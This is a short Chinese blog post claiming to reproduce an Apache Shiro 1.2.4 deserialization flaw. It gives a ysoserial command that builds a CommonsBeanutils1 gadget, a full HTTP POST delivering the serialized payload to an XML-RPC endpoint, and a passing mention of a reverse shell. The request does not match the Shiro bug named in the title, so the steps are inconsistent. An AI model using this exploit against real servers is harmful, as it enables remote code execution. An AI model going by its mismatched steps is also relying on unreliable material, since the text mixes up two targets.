Apache Shiro 1.2.4反序列化漏洞复现

0x01.

0x02.复现

1.反序列化工具ysoserial下载需要的模块

出现BuildSuccess即成功(kali默认使用openjdk,不配置$JAVA_HOME废了半天劲才Build成功)
目录下出现ysoserial-0.0.6-SNAPSHOT-all.jar

2.使用ysoserial生成CommonsBeanutils1的Gadget:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser

3.POST数据
POC:

POST /webtools/control/xmlrpc HTTP/1.1

Host: your-ip

Content-Type: application/xml

Content-Length: 4093

<?xml version="1.0"?>

<methodCall>

<methodName>ProjectDiscovery</methodName>

<params>

<param>

<value>

<struct>

<member>

<name>test</name>

<value>

<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>

</value>

</member>

</struct>

</value>

</param>

</params>

</methodCall>

服务器后台/tmp中成功写入文件。

4.反射shell

将b64加密过的shell再在ysoserial中加密一次

原POC上传

posted on 2021-03-26 15:12  Stunmaker  阅读(279)  评论(0)    收藏  举报
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3